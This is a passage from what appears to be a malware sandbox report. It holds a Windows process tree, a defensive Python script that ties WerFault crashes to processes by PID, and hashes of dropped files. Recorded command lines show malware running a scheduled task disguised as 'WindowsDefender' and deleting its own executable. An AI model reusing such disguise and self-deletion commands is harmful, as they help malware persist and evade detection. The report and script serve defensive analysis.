PID:1068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"6⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"7⤵PID:736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:4908
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2644
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2340
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:1980
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2024
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4540 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 4164 -ip 41642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2544
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 3276 -ip 32762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4780
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 2404 -ip 24042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1684
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 500 -p 2500 -ip 25002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4868
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 224 -p 832 -ip 8322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2864
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 408 -ip 4082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2332
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1732 -ip 17322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4740
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 224 -p 2400 -ip 24002⤵PID:1524
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4336 -ip 43362⤵PID:2768
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 500 -p 4620 -ip 46202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1716
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4744 -ip 47442⤵PID:1228
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4236 -ip 42362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4192
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 1948 -ip 19482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3280
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 3084 -ip 30842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4556
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 1240 -ip 12402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:944
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3684 -ip 36842⤵PID:3532
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 1036 -ip 10362⤵PID:4764
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 3148 -ip 31482⤵PID:4464
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 224 -p 2424 -ip 24242⤵PID:2956
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4476 -ip 44762⤵PID:3668
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 1228 -ip 12282⤵PID:4788
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3132 -ip 31322⤵PID:4892
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 224 -ip 2242⤵PID:1844
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 4240 -ip 42402⤵PID:2176
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4860 -ip 48602⤵PID:3012
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1644 -ip 16442⤵PID:3024
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 3448 -ip 34482⤵PID:2004
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 3120 -ip 31202⤵PID:2552
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 3772 -ip 37722⤵PID:1320
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 3860 -ip 38602⤵PID:4692
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4688 -ip 46882⤵PID:1820
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4940 -ip 49402⤵PID:2360
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2052
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:2404
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2404 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3720
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2500
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2500 -s 7922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4668
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:832
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 832 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3012
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:408
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 408 -s 7802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1680
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1732
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1732 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3448
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:2400
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2400 -s 2282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3456
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4620
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4620 -s 7442⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4256
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:4336
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4336 -s 6802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:940
-
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
PID:4744
    C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4744 -s 384
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1952
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
PID:4236
    C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4236 -s 356
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1892
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
PID:1948
    C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1948 -s 356
    - Program crash
    PID:4544
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
PID:3084
    C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3084 -s 484
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1140
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
PID:1240
    C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1240 -s 492
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:3712
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3684 -s 492
- Program crash
PID:1940
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1036 -s 356
- Program crash
PID:1864
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3148 -s 432
- Program crash
PID:2916
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2424 -s 468
- Program crash
PID:3632
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4476 -s 488
- Program crash
PID:3692
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1228
    C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1228 -s 244
    - Program crash
    PID:5004
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3132 -s 500
- Program crash
PID:4644
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 224 -s 420
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4544
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4240 -s 472
- Program crash
PID:2732
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4860 -s 492
- Program crash
PID:4324
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1644 -s 400
- Program crash
PID:3100
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3448 -s 356
- Program crash
PID:2432
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3120 -s 480
- Program crash
PID:1732
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3772 -s 432
- Program crash
PID:1436
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3860 -s 444
- Program crash
PID:3424
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4688 -s 396
- Program crash
PID:2928
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4940 -s 496
- Program crash
PID:3720
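The tail of the process tree above is a run of COM surrogate instances (DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}) each followed by a WerFault.exe child launched as "-u -p <pid> -s <event>", plus WerFault rows whose -p target never appears as a process in the recorded tree. One thing to notice before correlating on PID: PID:4544 is recorded twice, once as the WerFault for 1948 and later as the WerFault for 224, so the sandbox reused it after the first instance exited. The script below is an added example and not part of the Triage report: it attributes every WerFault row to the image it reports on via WerFault's own -p argument (no parent link needed), counts crashes per image to surface a crash loop, and flags both unresolved targets and reused PIDs. The rows are transcribed from the tree; a production feed would carry a process GUID or start time to make the reused-PID case unambiguous.

```python
import ntpath
import re
from collections import Counter, defaultdict

# Constructed sample transcribed from the process tree in this report:
# (pid, image path, command line). Each WerFault.exe row carries the PID of
# the process it was launched for in its own "-p" argument, so the parent
# link in the tree is not needed to attribute the crash.
PROCESSES = [
    (4744, r"C:\Windows\system32\DllHost.exe",
     r"C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}"),
    (1952, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 4744 -s 384"),
    (4236, r"C:\Windows\system32\DllHost.exe",
     r"C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}"),
    (1892, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 4236 -s 356"),
    (1948, r"C:\Windows\system32\DllHost.exe",
     r"C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}"),
    (4544, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 1948 -s 356"),
    (1228, r"C:\Windows\system32\DllHost.exe",
     r"C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}"),
    (5004, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 1228 -s 244"),
    # WerFault row whose -p target never appears as a process in the tree.
    (1940, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 3684 -s 492"),
    # PID 4544 is recorded a second time: the sandbox reused it for another WerFault.
    (4544, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 224 -s 420"),
]

# WerFault's user-mode invocation: -u (user), -p <crashed pid>, -s <event handle>.
WERFAULT_RE = re.compile(r"\bWerFault\.exe\b.*?-p\s+(\d+)\s+-s\s+(\d+)", re.IGNORECASE)


def crashed_pid(cmdline):
    """Return the PID a WerFault.exe command line reports on, or None."""
    m = WERFAULT_RE.search(cmdline)
    return int(m.group(1)) if m else None


def analyse(processes, crash_threshold=3):
    """Attribute every WerFault row to the crashed image and flag PID reuse."""
    images_by_pid = defaultdict(list)
    for pid, image, _ in processes:
        images_by_pid[pid].append(ntpath.basename(image).lower())

    crashes_by_image = Counter()
    unresolved = []  # -p targets with no process row in the tree
    ambiguous = []   # -p targets whose PID was recorded for different images
    for _pid, _image, cmdline in processes:
        target = crashed_pid(cmdline)
        if target is None:
            continue
        images = images_by_pid.get(target)
        if not images:
            unresolved.append(target)
        elif len(set(images)) > 1:
            ambiguous.append(target)   # PID alone cannot say which process crashed
        else:
            crashes_by_image[images[0]] += 1

    return {
        "crashes_by_image": dict(crashes_by_image),
        "crash_loops": sorted(i for i, n in crashes_by_image.items() if n >= crash_threshold),
        "unresolved": sorted(unresolved),
        "ambiguous": sorted(ambiguous),
        "reused_pids": sorted(p for p, imgs in images_by_pid.items() if len(imgs) > 1),
    }


if __name__ == "__main__":
    for key, value in analyse(PROCESSES).items():
        print(f"{key}: {value}")
```

On the transcribed rows this attributes four crashes to dllhost.exe, leaves 224 and 3684 unresolved, and reports 4544 as a reused PID. The crash_threshold is a hypothetical tuning knob; the point is that a burst of WerFault launches for one surrogate image is worth an alert on its own, independent of whatever caused the crashes.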
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
5.1MB
MD5
2438b851e157a3f70bd48af1984b2139
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
5.1MB
MD5
2438b851e157a3f70bd48af1984b2139
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
36KB
MD5
243d5f63c7130bb365b36bd606086e46
SHA1
a1477b17e92e6210d423a7084c1ed794043397c7
SHA256
48dac6f702967bfa16392d24bf8cb4577600bfb3ec0328b969c4d3eb707de2ef
SHA512
646d02c1bbb4098b9b2e8c1c2a2fe31807048a61e232ce3abeab1cf1fb50e3094201a9ebf06c7f2d2c789e583bd59d6716e70c302e41c8d61fcbf4bf9e238697
-
Filesize
13KB
MD5
63cf9f11b7acbcc3a0974922d11b9b10
SHA1
87e6fd212abd80650f88c07e158d30bdd8273186
SHA256
8851458f8fe3caca2b1b9a78ece5fae88beebc6a32b7aca35d445146e12a6f24
SHA512
25b23f8dfa5df5d26011c3eeda7fd1c3a341dce99826b2a7968ae4e1a1371cb3cacf4ff0a7e61558991121809270ab99682157a2beba09e03139477c4e0cec7a
-
Filesize
35KB
MD5
03100eacafb083f5432d7f67ed015f74
SHA1
967b38bebd0329c7d9c32bed301e624317a6031a
SHA256
e01d51af096f2af59d0a8124a48aaebc0646e882e0859b50524a9425df837378
SHA512
3affc54f5914a27e8b603ddd8b5871d5e20d4fd4f1a49e8de0d71f76a66d3694fe53f33455c9898038c284f1acc69094df2177959980c537f7194958b9e89905
-
Filesize
13KB
MD5
e287a69b04340d41cba0f05926076339
SHA1
3ff5b95fc2ee7a9cc45368548b97dbb1e03462ce
SHA256
9e9dd8b9718f232bcd3cbf589e7aad7bdc1170b53159e7375ec99530df101272
SHA512
d6bb99aaa09491715742d178639a42e546095b921b95b675e069bfd4bf2f43fc7e8bf65e04e3d9d30567f268f93c0943cd5d23566b7261294b9d9f27745773d0
-
Filesize
36KB
MD5
d02eba271c159725647c77f651e772e0
SHA1
71eb18a0b8942fd7b27028f9932ea371d4dc1d29
SHA256
5b4b7d628cd830f2f69b823b8c27ef67635d372981de7d59d8f6e24158fa789e
SHA512
68881c3e54b83ce96f0645352109a5e060ad16ac3dcf4b7d3ace0388d1a90ecfb1ddcf9252ae693be05f679733c1f25930244560c65f78e1006e289eb5692319
-
Filesize
13KB
MD5
bbbe2eaad759d3f30ad8e9eae34945ec
SHA1
a603e6b3659c1713613aa5ca5087015f15fac9d0
SHA256
550818128aa84b0a2383e2e5229a37e8106d09f06a26bfe4cb668b7b5045145e
SHA512
5800d514c8c5a0fbea27bcf367dc34ed975b65ee483a337889d97cc7724ceb3084053e2430f101756ef21c8b04cd332e8d988d5394f87074a3cdf902376cdbd8
-
Filesize
35KB
MD5
c351a34de9b920b560a2c7776c522e40
SHA1
f0ae213c014eb7ee43d657b4a737436d6a11e369
SHA256
79b4665eef394c9dcec1db4a18054a9996d30f07b573f356b5e5fab8b2fdaca6
SHA512
b0ea2e7bcb6ba1790a2721af493e0a3c63e190bbb8652f00bf80a54c5d2b1fab28e20de3c2ae490a471d0d0e2e822256d5e84a532b4d61683f5042da616adbbb
-
Filesize
13KB
MD5
7ff390e0d3b069d66815b7f6a1834a7a
SHA1
d2823bdb0282c416e7a63aeb69f1ea7ccbba8d78
SHA256
2c1dd87746d8a34e22f0ac4020579252431c80f92be37d15473e5817abef65fa
SHA512
de8eb1ef9dc7e3bffa81d8003f6a6e78ca9b72d8c750a6307ea1df8808602d6db6d161feda4ba08d8af38fc88cf33b584a52f88b5b9f71e46039de32c9f44d19
-
Filesize
36KB
MD5
1643ccef946fb2ed379cf3e29c0260a4
SHA1
f54725cd15947387d4a5842ad27050dddef00fe1
SHA256
80ad2a9ff737bc816a04cba33c111795c13d72612c3a7b67840d7dcd6651941d
SHA512
ffc526337913f2981860053f3450a03c467246580daae604ee9741a290855c32b2b55701c770d8455bbef589cace0c1737a02f6391b621c3e0839a8871fe6eb2
-
Filesize
36KB
MD5
af9dd512c51bec0f4188a233a8405236
SHA1
7bd7ba1a6529f441b5b8e44da2a516d7a525d9b3
SHA256
9c32dcfdce4c40becd0389a658e1c2cef802d34cb21ea2989ed03b8112376a89
SHA512
545e5454617cca1221be769abda3f353cecc039e1db766bc07aebd9d56c0f0184c6112fbdcd97792c858364b589f977959955b2a116e8a8cbe688430d924d267
-
Filesize
13KB
MD5
b8fbec6a1b56789ee8de218a5b41bc5f
SHA1
c61681d6253cf3a65e09ac99bd3e070bb3eca154
SHA256
b757ab7fc7ca7ae06633f4ed14291ca4aa5ffff1e64ccc51cf9278f6fa5e40e3
SHA512
498f4c44d94bd50ba7a3a4f38172d94d4befa28438a881474ebc41a5842c75c49a2e6283296f315642ec05dbe5e02c0837c51b32451104b76643e0fdaeee0297
-
Filesize
13KB
MD5
8b065a8dee2f706d2126769d9928e536
SHA1
474b37893606662d9a7baf7457eba4ef11811e5a
SHA256
f5a7a685ac8500af27342d85cf5849317e311417ef1f3e30829a78beb576dfe3
SHA512
a7444ea59d1254298fa9b0402a8d71b1e6071a2d4845058e2972e64e3d205de91eedbaa2c5c6f8cd7766547f948f669e2d10ec6bb8bfd422ae702c213a7d9993
-
Filesize
36KB
MD5
ab8f68ffc7caa43538c4ca41316ba816
SHA1
db0ea52612ec9989bdf64288386ef86cd3e6fb0a
SHA256
b282816e733b77736d9650eb88924772799e55dd21bce1867961ccad922cfe05
SHA512
a16c79daa9e88cb4fc81b811ce1345f4c10befa9e18e7e31d127cdc722f95ca243b44e2dcbab5b753e4c36bf69730714be6aaf8681b438c88c8663138f571431
-
Filesize
13KB
MD5
25b41b7fb02cc902f8435e3b368681ec
SHA1
252befa757513f91b1c231b8999989960c0b0569
SHA256
3bc3f6eddad5faa3eb0270cb1a580c67ea510749abf63951a3ab6c5f0ef39a6b
SHA512
6633c78f2597cbb3ed79ffce537a5af6bd4aa8007c5bd4f4d011ad5bef9768e692d056198af16399a0b6a1f9d4c48c0f18c66ef484808faeb9d40638ad48f9a1
-
Filesize
36KB
MD5
364131f36547208806546d1f277ec30e
SHA1
46e3755480485449b4fe7cffccfca780d43b5d02
SHA256
46ec60ba02ab1024609b071815895be2a3ee12b15dfbf7a3a7a91edf2e96e984
SHA512
6b6348b7562710393fae117f112a6a23afd6dcf1b7e7d0321f40c841d36a852591c714c0f974ed02dfbca976c9eda4808fe0d4faaa89cef1c2bccff297216656
-
Filesize
38KB
MD5
bd967cecd4c31d7a19ed945d51560c3b
SHA1
385e0bd2e750ab9a69c2b143943396a191714623
SHA256
0490212e1be50d2e84befd6c168487e2ad0461f91d5dde7b02df74791a882f15
SHA512
07926e3b35127306f0d438a7a4018fb30a929f267d11e7f47a61f50523b6f56df58d00aa2f70184f51bb7db9677b021733557a6f13aa65b2bd5d9f7214b3c121
-
Filesize
38KB
MD5
5afa56d15b52aef824f58bb64f02da22
SHA1
c87e38134f484aab1aa32ab246a4ecd6a08af717
SHA256
180c8dfff84e9b69590c244d7331cd21e387b07e71d5331c8516084559c6715d
SHA512
bace7732e7eb468d697b45642e393f895a2dda5d7bdeab3258d6a7f377ba729f21f7d9a3db91f9c4c7d0fe4ddf5053a8376c8d16a273f8c53e0234885266ccac
-
Filesize
13KB
MD5
209eb9a46f2ec8671ba1633c4ba6b75d
SHA1
7b90ac451744d962c439953d58af1e6c771d36c8
SHA256
4211875719fe294f1a8e155629e94ac2496f727b234ba72a9abf398a8ced7a60
SHA512
af213d61f79056ff351139cd86c0ce91626ca8f32bdaeb1f983214e08195af2c682ed53691881eef36c3b0370d9e9c7ea94a96a2e113930f3ac4a7b4e653177c
-
Filesize
13KB
MD5
fab72915f21ba05ad1a3a2caaa8aee11
SHA1
38b9d57a4f57ebc3bf62fc84af174205a78c4324
SHA256
4049eb85fa2d0ae6acc71e06948c51dd34ccd004a089c39a8d8e152e74da4a39
SHA512
698b230832cc82621473f77bfc999acdb93b5650630135ff33c6b1cc48a73e298971206f72406af8bafcf44aac1e4eaea43e634538e79ddd5291c9701593fc7b
-
Filesize
612KB
MD5
f07d9977430e762b563eaadc2b94bbfa
SHA1
